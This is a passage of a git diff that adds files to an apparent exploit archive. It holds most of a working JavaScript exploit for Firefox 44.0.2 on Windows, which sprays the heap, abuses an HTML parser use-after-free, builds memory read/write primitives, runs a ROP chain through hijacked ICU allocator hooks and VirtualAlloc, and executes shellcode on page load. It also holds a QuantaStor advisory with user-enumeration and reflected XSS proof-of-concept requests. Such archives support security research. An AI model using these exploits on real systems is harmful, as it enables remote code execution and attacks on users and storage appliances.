+            "\x8b\x84\x24\x0c\x00\x00\x00", /* mov eax, dword [esp + 0xc] */
+            "\x50",                         /* push eax */
+            "\x8b\x84\x24\x0c\x00\x00\x00", /* mov eax, dword [esp + 0xc] */
+            "\x50",                         /* push eax */
+            "\x8b\x05" + realloc.func.str,  /* mov eax, [location-of-realloc] */
+            "\xff\xd0",                     /* call eax */
+            "\x59",                         /* pop ecx */
+            "\x59",                         /* pop ecx */
+            "\xc3",                         /* ret */
+        ].join("");
+        u32array[realloc.func.idx] = this.pe.search("mozglue.dll", "realloc");
+        this.rwx.writeString(realloc.addr, realloc.code);
+
+        this.u_setMemoryFunctions_55(0,
+                                     alloc.addr,
+                                     realloc.addr,
+                                     free.addr,
+                                     status.addr);
+        if (u32array[status.idx] !== 0) {
+            throw new Error("u_setMemoryFunctions_55() failed");
+        }
+    };
+
+    /*
+     * Allocates a small chunk of memory marked RWX, which is used
+     * to allocate a `size'-byte chunk (see uprv_malloc_55()).  The
+     * first allocation is then repurposed in reset().
+     */
+    this.alloc = function(stackAddr, size) {
+        /*
+         * hijack the function pointers
+         */
+        this.set();
+
+        /*
+         * do the initial 0x40 byte allocation
+         */
+        const chunk = this.uprv_malloc_55(stackAddr);
+        log("allocated 0x40 byte chunk at 0x" + chunk.toString(16));
+
+        /*
+         * allocate a larger chunk now that we're no longer limited to ROP/JOP
+         */
+        const u32array = this.rwx.u32array;
+        const func = this.rwx.calloc(4);
+        func.str = this.dword2str(func.addr);
+        u32array[func.idx] = this.pe.search("kernel32.dll", "VirtualAlloc");
+        const code = [
+            "\x87\xe7",                    /* xchg edi, esp (orig stack) */
+            "\x6a\x40",                    /* push 0x40 (flProtect) */
+            "\x68\x00\x10\x00\x00",        /* push 0x1000 (flAllocationType) */
+            "\xb8" + this.dword2str(size), /* move eax, size */
+            "\x50",                        /* push eax (dwSize) */
+            "\x6a\x00",                    /* push 0 (lpAddress) */
+            "\x8b\x05" + func.str,         /* mov eax, [loc-of-VirtualAlloc] */
+            "\xff\xd0",                    /* call eax */
+            "\x87\xe7",                    /* xchg edi, esp (back to heap) */
+            "\xc3",                        /* ret */
+        ].join("");
+        this.rwx.writeString(chunk, code);
+        const newChunk = this.rop.execute(chunk, [], false);
+        log("allocated " + size + " byte chunk at 0x" + newChunk.toString(16));
+
+        /*
+         * repurpose the first rwx chunk to restore functionality
+         */
+        this.reset(chunk);
+
+        return newChunk;
+    };
+
+    this.dword2str = function(dword) {
+        let str = "";
+        for (let i = 0; i < 4; i++) {
+            str += String.fromCharCode((dword >> 8 * i) & 0xff);
+        }
+        return str;
+    };
+}
+
+function KERNEL32(rop, pe, rwx) {
+    this.rop = rop;
+    this.pe = pe;
+    this.rwx = rwx;
+
+    /*
+     * Retrieves a handle for an imported module
+     */
+    this.GetModuleHandleA = function(lpModuleName) {
+        const func = this.pe.search("kernel32.dll", "GetModuleHandleA");
+        const name = this.rwx.copyString(lpModuleName);
+        const module = this.rop.execute(func, [name.addr], false);
+        if (module === 0) {
+            throw new Error("could not get a handle for " + lpModuleName);
+        }
+        return module;
+    };
+
+    /*
+     * Retrieves the address of an exported symbol.  Do not invoke this
+     * function on protected modules (if you want to bypass EAF); instead
+     * try to locate the symbol in any of the import tables or choose
+     * another target.
+     */
+    this.GetProcAddress = function(hModule, lpProcName) {
+        const func = this.pe.search("kernel32.dll", "GetProcAddress");
+        const name = this.rwx.copyString(lpProcName);
+        const addr = this.rop.execute(func, [hModule, name.addr], false);
+        if (addr === 0) {
+            throw new Error("could not get address for " + lpProcName);
+        }
+        return addr;
+    };
+
+    /*
+     * Retrieves a handle for the current thread
+     */
+    this.GetCurrentThread = function() {
+        const func = this.pe.search("kernel32.dll", "GetCurrentThread");
+        return this.rop.execute(func, [], false);
+    };
+}
+
+function NTDLL(rop, pe, rwx) {
+    this.rop = rop;
+    this.pe = pe;
+    this.rwx = rwx;
+
+    /*
+     * Retrieves the stack limit from the Thread Environment Block
+     */
+    this.getStackLimit = function(ThreadHandle) {
+        const mem = this.rwx.calloc(0x1c);
+        this.NtQueryInformationThread(ThreadHandle, 0, mem.addr, mem.size, 0);
+        return this.rwx.readDWord(this.rwx.u32array[mem.idx+1] + 8);
+    };
+
+    /*
+     * Retrieves thread information
+     */
+    this.NtQueryInformationThread = function(ThreadHandle,
+                                             ThreadInformationClass,
+                                             ThreadInformation,
+                                             ThreadInformationLength,
+                                             ReturnLength) {
+        const func = this.pe.search("ntdll.dll", "NtQueryInformationThread");
+        const ret = this.rop.execute(func, arguments, false);
+        if (ret !== 0) {
+            throw new Error("NtQueryInformationThread failed");
+        }
+        return ret;
+    };
+}
+
+function ReadWriteExecute(u32base, u32array, array) {
+    this.u32base = u32base;
+    this.u32array = u32array;
+    this.array = array;
+
+    /*
+     * Reads `length' bytes from `addr' through a fake string
+     */
+    this.readBytes = function(addr, length) {
+        /* create a string-jsval */
+        this.u32array[4] = this.u32base + 6*4;   /* addr to meta */
+        this.u32array[5] = 0xffffff85;           /* type (JSVAL_TAG_STRING) */
+
+        /* metadata */
+        this.u32array[6] = 0x49;   /* flags */
+        this.u32array[7] = length; /* read size */
+        this.u32array[8] = addr;   /* memory to read */
+
+        /* Uint8Array is *significantly* slower, which kills our ROP hunting */
+        const result = new Array();
+
+        const str = this.getArrayElem(4);
+        for (let i = 0; i < str.length; i++) {
+            result[i] = str.charCodeAt(i);
+        }
+
+        return result;
+    };
+
+    this.readDWords = function(addr, num) {
+        const bytes = this.readBytes(addr, num * 4);
+        const dwords = new Uint32Array(num);
+        for (let i = 0; i < bytes.length; i += 4) {
+            for (let j = 0; j < 4; j++) {
+                dwords[i/4] |= bytes[i+j] << (8 * j);
+            }
+        }
+        return dwords;
+    };
+
+    this.readDWord = function(addr) {
+        return this.readDWords(addr, 1)[0];
+    };
+
+    this.readWords = function(addr, num) {
+        const bytes = this.readBytes(addr, num * 2);
+        const words = new Uint16Array(num);
+        for (let i = 0; i < bytes.length; i += 2) {
+            for (let j = 0; j < 2; j++) {
+                words[i/2] |= bytes[i+j] << (8 * j);
+            }
+        }
+        return words;
+    };
+
+    this.readWord = function(addr) {
+        return this.readWords(addr, 1)[0];
+    };
+
+    this.readString = function(addr) {
+        for (let i = 0, str = ""; ; i++) {
+            const chr = this.readBytes(addr + i, 1)[0];
+            if (chr === 0) {
+                return str;
+            }
+            str += String.fromCharCode(chr);
+        }
+    };
+
+    /*
+     * Writes `values' to `addr' by using the metadata of an Uint8Array
+     * to set up a write primitive
+     */
+    this.writeBytes = function(addr, values) {
+        /* create jsval */
+        const jsMem = this.calloc(8);
+        this.setArrayElem(jsMem.idx, new Uint8Array(values.length));
+
+        /* copy metadata */
+        const meta = this.readDWords(this.u32array[jsMem.idx], 12);
+        const metaMem = this.calloc(meta.length * 4);
+        for (let i = 0; i < meta.length; i++) {
+            this.u32array[metaMem.idx + i] = meta[i];
+        }
+
+        /* change the pointer to the contents of the Uint8Array */
+        this.u32array[metaMem.idx + 10] = addr;
+
+        /* change the pointer to the metadata */
+        const oldMeta = this.u32array[jsMem.idx];
+        this.u32array[jsMem.idx] = metaMem.addr;
+
+        /* write */
+        const u8 = this.getArrayElem(jsMem.idx);
+        for (let i = 0; i < values.length; i++) {
+            u8[i] = values[i];
+        }
+
+        /* clean up */
+        this.u32array[jsMem.idx] = oldMeta;
+    };
+
+    this.writeDWords = function(addr, values) {
+        const u8 = new Uint8Array(values.length * 4);
+        for (let i = 0; i < values.length; i++) {
+            for (let j = 0; j < 4; j++) {
+                u8[i*4 + j] = values[i] >> (8 * j) & 0xff;
+            }
+        }
+        this.writeBytes(addr, u8);
+    };
+
+    this.writeDWord = function(addr, value) {
+        const u32 = new Uint32Array(1);
+        u32[0] = value;
+        this.writeDWords(addr, u32);
+    };
+
+    this.writeString = function(addr, str) {
+        const u8 = new Uint8Array(str.length);
+
+        for (let i = 0; i < str.length; i++) {
+            u8[i] = str.charCodeAt(i);
+        }
+        this.writeBytes(addr, u8);
+    };
+
+    /*
+     * Copies a string to the `u32array' and returns an object from
+     * calloc().
+     *
+     * This is an ugly workaround to allow placing a string at a known
+     * location without having to implement proper support for JSString
+     * and its various string types.
+     */
+    this.copyString = function(str) {
+        str += "\x00".repeat(4 - str.length % 4);
+        const mem = this.calloc(str.length);
+
+        for (let i = 0, j = 0; i < str.length; i++) {
+            if (i && !(i % 4)) {
+                j++;
+            }
+            this.u32array[mem.idx + j] |= str.charCodeAt(i) << (8 * (i % 4));
+        }
+        return mem;
+    };
+
+    /*
+     * Creates a <div> and copies the contents of its vftable to
+     * writable memory.
+     */
+    this.createExecuteDiv = function() {
+        const div = {};
+
+        /* 0x3000 bytes should be enough for the div, vftable and gadgets */
+        div.mem = this.calloc(0x3000);
+
+        div.elem = document.createElement("div");
+        this.setArrayElem(div.mem.idx, div.elem);
+
+        /* addr of the div */
+        const addr = this.u32array[div.mem.idx];
+
+        /* *(addr+4) = this */
+        const ths = this.readDWord(addr + 4*4);
+
+        /* *this = xul!mozilla::dom::HTMLDivElement::`vftable' */
+        const vftable = this.readDWord(ths);
+
+        /* copy the vftable (the size is a guesstimate) */
+        const entries = this.readDWords(vftable, 512);
+        this.writeDWords(div.mem.addr + 4*2, entries);
+
+        /* replace the pointer to the original vftable with ours */
+        this.writeDWord(ths, div.mem.addr + 4*2);
+
+        return div;
+    };
+
+    /*
+     * Replaces two vftable entries of the previously created div and
+     * triggers code execution
+     */
+    this.execute = function(pivot, postPivot) {
+        /* vftable entry for xul!nsGenericHTMLElement::QueryInterface
+         * kind of ugly, but we'll land here after the pivot that's used
+         * in ROPHelper.execute() */
+        const savedQueryInterface = this.u32array[this.div.mem.idx + 2];
+        this.u32array[this.div.mem.idx + 2] = postPivot;
+
+        /* vftable entry for xul!nsGenericHTMLElement::Click */
+        const savedClick = this.u32array[this.div.mem.idx + 131];
+        this.u32array[this.div.mem.idx + 131] = pivot;
+
+        /* execute */
+        this.div.elem.click();
+
+        /* restore our overwritten vftable pointers */
+        this.u32array[this.div.mem.idx + 2] = savedQueryInterface;
+        this.u32array[this.div.mem.idx + 131] = savedClick;
+    };
+
+    /*
+     * Reserves space in the `u32array' and initializes it to 0.
+     *
+     * Returns an object with the following properties:
+     * - idx: index of the start of the allocation in the u32array
+     * - addr: start address of the allocation
+     * - size: non-padded allocation size
+     * - realSize: padded size
+     */
+    this.calloc = function(size) {
+        let padded = size;
+        if (!size || size % 4) {
+            padded += 4 - size % 4;
+        }
+
+        const found = [];
+        /* the first few dwords are reserved for the metadata belonging
+         * to `this.array' and for the JSString in readBytes (since using
+         * this function would impact the speed of the ROP hunting) */
+        for (let i = 10; i < this.u32array.length - 1; i += 2) {
+            if (this.u32array[i] === 0x11223344 &&
+                this.u32array[i+1] === 0x55667788) {
+                found.push(i, i+1);
+                if (found.length >= padded / 4) {
+                    for (let j = 0; j < found.length; j++) {
+                        this.u32array[found[j]] = 0;
+                    }
+                    return {
+                        idx: found[0],
+                        addr: this.u32base + found[0]*4,
+                        size: size,
+                        realSize: padded,
+                    };
+                }
+            } else {
+                found.length = 0;
+            }
+        }
+        throw new Error("calloc(): out of memory");
+    };
+
+    /*
+     * Returns an element in `array' based on an index for `u32array'
+     */
+    this.getArrayElem = function(idx) {
+        if (idx <= 3 || idx % 2) {
+            throw new Error("invalid index");
+        }
+        return this.array[(idx - 4) / 2];
+    };
+
+    /*
+     * Sets an element in `array' based on an index for `u32array'
+     */
+    this.setArrayElem = function(idx, value) {
+        if (idx <= 3 || idx % 2) {
+            throw new Error("invalid index");
+        }
+        this.array[(idx - 4) / 2] = value;
+    };
+
+    this.div = this.createExecuteDiv();
+}
+
+function PortableExecutable(base, rwx) {
+    this.base = base;
+    this.rwx = rwx;
+    this.imports = {};
+    this.text = {};
+
+    /*
+     * Parses the PE import table.  Some resources of interest:
+     *
+     * - An In-Depth Look into the Win32 Portable Executable File Format
+     *   https://msdn.microsoft.com/en-us/magazine/bb985992(printer).aspx
+     *
+     * - Microsoft Portable Executable and Common Object File Format Specification
+     *   https://www.microsoft.com/en-us/download/details.aspx?id=19509
+     *
+     * - Understanding the Import Address Table
+     *   http://sandsprite.com/CodeStuff/Understanding_imports.html
+     */
+    this.read = function() {
+        const rwx = this.rwx;
+        let addr = this.base;
+
+        /*
+         * DOS header
+         */
+        const magic = rwx.readWord(addr);
+        if (magic !== 0x5a4d) {
+            throw new Error("bad DOS header");
+        }
+        const lfanew = rwx.readDWord(addr + 0x3c, 4);
+        addr += lfanew;
+
+        /*
+         * Signature
+         */
+        const signature = rwx.readDWord(addr);
+        if (signature !== 0x00004550) {
+            throw new Error("bad signature");
+        }
+        addr += 4;
+
+        /*
+         * COFF File Header
+         */
+        addr += 20;
+
+        /*
+         * Optional Header
+         */
+        const optionalMagic = rwx.readWord(addr);
+        if (optionalMagic !== 0x010b) {
+            throw new Error("bad optional header");
+        }
+
+        this.text.size = rwx.readDWord(addr + 4);
+        this.text.base = this.base + rwx.readDWord(addr + 20);
+
+        const numberOfRvaAndSizes = rwx.readDWord(addr + 92);
+        addr += 96;
+
+        /*
+         * Optional Header Data Directories
+         *
+         * N entries * 2 DWORDs (RVA and size)
+         */
+        const directories = rwx.readDWords(addr, numberOfRvaAndSizes * 2);
+
+        for (let i = 0; i < directories[3] - 5*4; i += 5*4) {
+            /* Import Directory Table (N entries * 5 DWORDs) */
+            const members = rwx.readDWords(this.base + directories[2] + i, 5);
+            const lookupTable = this.base + members[0];
+            const dllName = rwx.readString(this.base+members[3]).toLowerCase();
+            const addrTable = this.base + members[4];
+
+            this.imports[dllName] = {};
+
+            /* Import Lookup Table */
+            for (let j = 0; ; j += 4) {
+                const hintNameRva = rwx.readDWord(lookupTable + j);
+                /* the last entry is NULL */
+                if (hintNameRva === 0) {
+                    break;
+                }
+
+                /* name is not available if the dll is imported by ordinal */
+                if (hintNameRva & (1 << 31)) {
+                    continue;
+                }
+
+                const importName = rwx.readString(this.base + hintNameRva + 2);
+                const importAddr = rwx.readDWord(addrTable + j);
+                this.imports[dllName][importName] = importAddr;
+            }
+        }
+    };
+
+    /*
+     * Searches for an imported symbol
+     */
+    this.search = function(dll, symbol) {
+        if (this.imports[dll] === undefined) {
+            throw new Error("unknown dll: " + dll);
+        }
+
+        const addr = this.imports[dll][symbol];
+        if (addr === undefined) {
+            throw new Error("unknown symbol: " + symbol);
+        }
+        return addr;
+    };
+}
+
+function Spray() {
+    this.nodeBase = 0x80000000;
+    this.ptrNum = 64;
+    this.refcount = 0xffffffff;
+    /*
+     * 0:005> ?? sizeof(nsHtml5StackNode)
+     * unsigned int 0x1c
+     */
+    this.nsHtml5StackNodeSize = 0x1c;
+
+    /*
+     * Creates a bunch of fake nsHtml5StackNode:s with the hope of hitting
+     * the address of elementName->name when it's [xul!nsHtml5Atoms::style].
+     *
+     * Ultimately, the goal is to enter the conditional on line 2743:
+     *
+     * firefox-44.0.2/parser/html/nsHtml5TreeBuilder.cpp:2743
+     * ,----
+     * | 2214 void
+     * | 2215 nsHtml5TreeBuilder::endTag(nsHtml5ElementName* elementName)
+     * | 2216 {
+     * | ....
+     * | 2221   nsIAtom* name = elementName->name;
+     * | ....
+     * | 2741   for (; ; ) {
+     * | 2742     nsHtml5StackNode* node = stack[eltPos];
+     * | 2743     if (node->ns == kNameSpaceID_XHTML && node->name == name) {
+     * | ....
+     * | 2748       while (currentPtr >= eltPos) {
+     * | 2749         pop();
+     * | 2750       }
+     * | 2751       NS_HTML5_BREAK(endtagloop);
+     * | 2752     } else if (node->isSpecial()) {
+     * | 2753       errStrayEndTag(name);
+     * | 2754       NS_HTML5_BREAK(endtagloop);
+     * | 2755     }
+     * | 2756     eltPos--;
+     * | 2757   }
+     * | ....
+     * | 3035 }
+     * `----
+     *
+     * We get 64 attempts each time the bug is triggered -- however, in
+     * order to have a clean break, the last node has its flags set to
+     * NS_HTML5ELEMENT_NAME_SPECIAL, so that the conditional on line
+     * 2752 is entered.
+     *
+     * If we do find ourselves with a node->name == name, then
+     * nsHtml5TreeBuilder::pop() invokes nsHtml5StackNode::release().
+     * The release() method decrements the nodes refcount -- and, if the
+     * refcount reaches 0, also deletes it.
+     *
+     * Assuming everything goes well, the Uint32Array is allocated with
+     * the method presented by SkyLined/@berendjanwever in:
+     *
+     * "Heap spraying high addresses in 32-bit Chrome/Firefox on 64-bit Windows"
+     * http://blog.skylined.nl/20160622001.html
+     */
+    this.nodes = function(name, bruteforce) {
+        const nodes = new Uint32Array(0x19000000);
+        const size = this.nsHtml5StackNodeSize / 4;
+        const refcount = bruteforce ? this.refcount : 1;
+        let flags = 0;
+
+        for (let i = 0; i < this.ptrNum * size; i += size) {
+            if (i === (this.ptrNum - 1) * size) {
+                flags = 1 << 29; /* NS_HTML5ELEMENT_NAME_SPECIAL */
+                name = 0x0;
+            }
+            nodes[i] = flags;
+            nodes[i+1] = name;
+            nodes[i+2] = 0; /* popName */
+            nodes[i+3] = 3; /* ns (kNameSpaceID_XHTML) */
+            nodes[i+4] = 0; /* node */
+            nodes[i+5] = 0; /* attributes */
+            nodes[i+6] = refcount;
+            name += 0x100000;
+        }
+        return nodes;
+    };
+
+    /*
+     * Sprays pointers to the fake nsHtml5StackNode:s created in nodes()
+     */
+    this.pointers = function() {
+        const pointers = new Array();
+
+        for (let i = 0; i < 0x30000; i++) {
+            pointers[i] = new Uint32Array(this.ptrNum);
+            let node = this.nodeBase;
+            for (let j = pointers[i].length - 1; j >= 0; j--) {
+                pointers[i][j] = node;
+                node += this.nsHtml5StackNodeSize;
+            }
+        }
+        return pointers;
+    };
+
+    /*
+     * Sprays a bunch of arrays with the goal of having one hijack the
+     * previously freed Uint32Array
+     */
+    this.arrays = function() {
+        const array = new Array();
+
+        for (let i = 0; i < 0x800; i++) {
+            array[i] = new Array();
+            for (let j = 0; j < 0x10000; j++) {
+                /* 0x11223344, 0x55667788 */
+                array[i][j] = 2.5160082934009793e+103;
+            }
+        }
+        return array;
+    };
+
+    /*
+     * Not sure how reliable this is, but on 3 machines running win10 on
+     * bare metal and on a few VMs with win7/win10 (all with and without
+     * EMET), [xul!nsHtml5Atoms::style] was always found within
+     * 0x[00a-1c2]f[a-f]6(c|e)0
+     */
+    this.getNextAddr = function(current) {
+        const start = 0x00afa6c0;
+
+        if (!current) {
+            return start;
+        }
+
+        if ((current >> 20) < 0x150) {
+            return current + 0x100000*(this.ptrNum-1);
+        }
+
+        if ((current >> 12 & 0xf) !== 0xf) {
+            return (current + 0x1000) & ~(0xfff << 20) | (start >> 20) << 20;
+        }
+
+        if ((current >> 4 & 0xf) === 0xc) {
+            return start + 0x20;
+        }
+        throw new Error("out of guesses");
+    };
+
+    /*
+     * Returns the `name' from the last node with a decremented
+     * refcount, if any are found
+     */
+    this.findStyleAddr = function(nodes) {
+        const size = this.nsHtml5StackNodeSize / 4;
+
+        for (let i = 64 * size - 1; i >= 0; i -= size) {
+            if (nodes[i] === this.refcount - 1) {
+                return nodes[i-5];
+            }
+        }
+    };
+
+    /*
+     * Locates a subarray in `array' that overlaps with `nodes'
+     */
+    this.findArray = function(nodes, array) {
+        /* index 0..3 is metadata for `array' */
+        nodes[4] = 0x41414141;
+        nodes[5] = 0x42424242;
+
+        for (let i = 0; i < array.length; i++) {
+            if (array[i][0] === 156842099330.5098) {
+                return array[i];
+            }
+        }
+        throw new Error("Uint32Array hijack failed");
+    };
+}
+
+function log(msg) {
+    dump("=> " + msg + "\n");
+    console.log("=> " + msg);
+}
+
+let nodes;
+let hijacked;
+window.onload = function() {
+    if (!navigator.userAgent.match(/Windows NT [0-9.]+; WOW64; rv:44\.0/)) {
+        throw new Error("unsupported user-agent");
+    }
+
+    const spray = new Spray();
+
+    /*
+     * spray nodes
+     */
+    let bruteforce = true;
+    let addr = spray.getNextAddr(0);
+    const href = window.location.href.split("?");
+    if (href.length === 2) {
+        const query = href[1].split("=");
+        if (query[0] === "style") {
+            bruteforce = false;
+        }
+        addr = parseInt(query[1]);
+    }
+    nodes = spray.nodes(addr, bruteforce);
+
+    /*
+     * spray node pointers and trigger the bug
+     */
+    document.body.innerHTML = "<svg><img id='AAAA'>";
+    const pointers = spray.pointers();
+    document.getElementById("AAAA").innerHTML = "<title><template><td><tr><title><i></tr><style>td</style>";
+
+    /*
+     * on to the next run...
+     */
+    if (bruteforce === true) {
+        const style = spray.findStyleAddr(nodes);
+        nodes = null;
+        if (style) {
+            window.location = href[0] + "?style=" + style;
+        } else {
+            window.location = href[0] + "?continue=" + spray.getNextAddr(addr);
+        }
+        return;
+    }
+
+    /*
+     * reallocate the freed Uint32Array
+     */
+    hijacked = spray.findArray(nodes, spray.arrays());
+
+    /*
+     * setup helpers
+     */
+    const rwx = new ReadWriteExecute(spray.nodeBase, nodes, hijacked);
+
+    /* The first 4 bytes of the previously leaked [xul!nsHtml5Atoms::style]
+     * contain the address of xul!PermanentAtomImpl::`vftable'.
+     *
+     * Note that the subtracted offset is specific to firefox 44.0.2.
+     * However, since we can read arbitrary memory by this point, the
+     * base of xul could easily (albeit perhaps somewhat slowly) be
+     * located by searching for a PE signature */
+    const xulBase = rwx.readDWord(addr) - 0x1c1f834;
+
+    log("style found at 0x" + addr.toString(16));
+    log("xul.dll found at 0x" + xulBase.toString(16));
+
+    const xulPE = new PortableExecutable(xulBase, rwx);
+    xulPE.read();
+    const rop = new ROPHelper(xulPE, rwx);
+    const kernel32 = new KERNEL32(rop, xulPE, rwx);
+    const kernel32handle = kernel32.GetModuleHandleA("kernel32.dll");
+    const kernel32PE = new PortableExecutable(kernel32handle, rwx);
+    kernel32PE.read();
+    const ntdll = new NTDLL(rop, kernel32PE, rwx);
+    const icuuc55 = new ICUUC55(rop, xulPE, rwx);
+
+    /*
+     * execute shellcode
+     */
+    const stack = ntdll.getStackLimit(kernel32.GetCurrentThread());
+    const exec = icuuc55.alloc(stack, shellcode.length);
+    const proc = xulPE.search("kernel32.dll", "GetProcAddress");
+    rwx.writeString(exec, shellcode.join(""));
+    rop.execute(exec, [kernel32handle, proc], true);
+};
+</script>
+</head>
+</html>
diff --git a/platforms/xml/webapps/42517.txt b/platforms/xml/webapps/42517.txt
new file mode 100755
index 000000000..8f02f125c
--- /dev/null
+++ b/platforms/xml/webapps/42517.txt
@@ -0,0 +1,157 @@
+1. --- Advisory details ---
+
+Title: QuantaStor Software Define Storage mmultiple vulnerabilities
+
+Advisory ID: VVVSEC-2017-6943
+
+Advisory URL: http://www.vvvsecurity.com/advisories/vvvsecurity-advisory-2017-6943.txt
+
+Date published: 12/08/2017
+
+CVEs:
+     CVE-2017-9978 "Brute force login request using http post mechanism returns different errors",
+     CVE-2017-9979 "Rest call made for methods not implemented in the server return a response with the invalid method previously invoked."
+
+CVSS v3.0 score:
+     CVE-2017-9978 5.3 MEDIUM (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
+     CVE-2017-9979 6.1 MEDIUM (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
+
+2. --- Vulnerability details ---
+
+Class:
+    CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
+    CWE-203: Information Exposure Through Discrepancy
+
+Impact: Information disclosure
+
+Remotely Exploitable: Yes
+Locally Exploitable: No
+
+3. --- Vulnerability Description ---
+
+    OSNEXUS QuantaStor [1] Software Define Storage appliance was designed to ease the process of storage management.
+    From vendor's website "...QuantaStor SDS, deployed in datacenters worldwide, addresses a broad set of storage use
+    cases including server virtualization, big data, cloud computing, and high performance applications
+    through scale-out physical and virtual storage appliances..."
+
+    Three different vulnerabilities were found in the appliance. A user enumeration attack and two unauthenticated XSS.
+    These vulnerabilities could allow a remote attacker to obtain valid usernames to perform bruteforce attacks and
+    obtain sensitive information.
+
+
+4. --- Affected software versions ---
+
+              OSNEXUS QuantaStor v4 virtual appliance
+
+5. --- Technical description ---
+
+    5.1 --- User enumeration ---
+
+        QuantaStor login mechanism returns different messages if the account used to perform the login is valid or not in the system.
+        Leveraging this difference an attacker could be able to enumerate valid accounts.
+
+    5.1.1 --- Proof of Concept ---
+
+        Executing the following HTTP requests an attacker can perform a login request.
+
+        """
+
+        POST / HTTP/1.0
+        Content-Type: text/xml; charset=utf-8
+        Accept: application/soap+xml, application/dime, multipart/related, text/*
+        User-Agent: Axis/1.4
+        Host: localhost:5152
+        Cache-Control: no-cache
+        Pragma: no-cache
+        SOAPAction: ""
+        Authorization: Basic <REPLACE WITH BASE64 Encoded credentials>
+        Content-Length: 384
+
+
+        <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+        <soapenv:Body>
+        <objectGet xmlns="http://quantastor.osnexus.com/webservices/osn.xsd"><reserved xmlns="">
+        </reserved></auditLogGet></soapenv:Body></soapenv:Envelope>
+
+        """
+
+        If the user included in the request is valid, the error returned by the application will be:
+
+            <SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>SOAP-ENV:Server</faultcode><faultstring><fault>Authentication check failed for 'admin',
+            please verify your password was entered correctly. (10.10.0.1) [err=26]
+            </fault></faultstring><detail><detail><msg>Authentication check failed for 'admin', please verify your password was entered correctly. (10.10.0.1)
+            [err=26]</msg><loc>service/osn_security_manager.cpp:1298</loc></detail></detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>
+
+        But if the user doesn't exist in the system, the message will be:
+
+            <SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>SOAP-ENV:Server</faultcode><faultstring><fault>Authentication failed, please
+            verify your username, 'TESTUSER' is invalid. (10.10.0.1) [err=26]</fault></faultstring><detail><detail><msg>
+            Authentication failed, please verify your username, 'TESTUSER' is invalid. (10.10.0.1) [err=26]
+            </msg><loc>service/osn_security_manager.cpp:1256</loc></detail></detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>
+
+    5.2 --- Cross Site Scripting in "qsCall" parameter
+
+        QuantaStor API accepts parameters through the use of the "qsCall" parameter. If the method called
+        doesn't exist an error will be triggered containing the invalid method previously invoked.
+        The response sent to the user isn't sanitized.
+        An attacker can leverage this issue including arbitrary HTML or JavaScript code in the qsCall parameter.
+
+    5.2.2 --- Proof of Concept ---
+
+        Execute the following HTTP request.
+
+        """
+        https://<HOST>:8153/qstorapi?qsCall=%3Cscript%3Ealert(1)%3C/script%3E
+        """
+
+    5.3 --- Cross Site Scripting in "/qstorapi/jsonrpc"
+
+        QuantaStor "jsonrpc "API accepts parameters through the use of a JSON dictionary. If the method called
+        doesn't exist an error will be triggered containing the invalid method previously invoked.
+        The response sent to the user isn't sanitized.
+        An attacker can leverage this issue including arbitrary HTML or JavaScript code in the "method" key.
+
+    5.3.1 --- Proof of Concept ---
+
+        Execute the following HTTP request.
+
+        """
+        POST /qstorapi/jsonrpc HTTP/1.0
+
+        Accept: application/soap+xml, application/dime, multipart/related, text/*
+        User-Agent: Axis/1.4
+        Host: <HOST>:8153
+        Cache-Control: no-cache
+        Pragma: no-cache
+        Content-Type: application/json
+        Content-Length: 54
+
+
+        {"method":"<script>alert(1)</script>", "params":"asd"}
+        """
+
+
+6. --- Vendor information ---
+
+        OSNEXUS released Quantastor version 4.3.1 fixing CVE-2017-9978 and CVE-2017-9979
+
+7. --- Credits ---
+
+    These vulnerabilities were discovered by Nahuel D. Sanchez, VVVSecurity
+
+8. --- Report timeline ---
+
+    25/06/2017 -- VVVSecurity sent Advisory to OSNEXUS
+    29/06/2017 -- OSNEXUS confirmed the security vulnerabilities, CVE-2017-9978 and CVE-2017-9979 were provided.
+    24/07/2017 -- OSNEXUS released QuantaStor version 4.3.1
+    12/08/2017 -- Security Advisory published
+
+9. --- References ---
+
+    [1] https://www.osnexus.com/software-defined-storage/
+
+10. --- Copyright ---
+
+    The contents of this advisory are copyright (c) 2017 VVVSecurity and are licensed
+    under a Creative Commons Attribution Non-Commercial Share-Alike 4.0
+    License: http://creativecommons.org/licenses/by-nc-sa/4.0/ <http://creativecommons.org/licenses/by-nc-sa/4.0/> 
\ No newline at end of file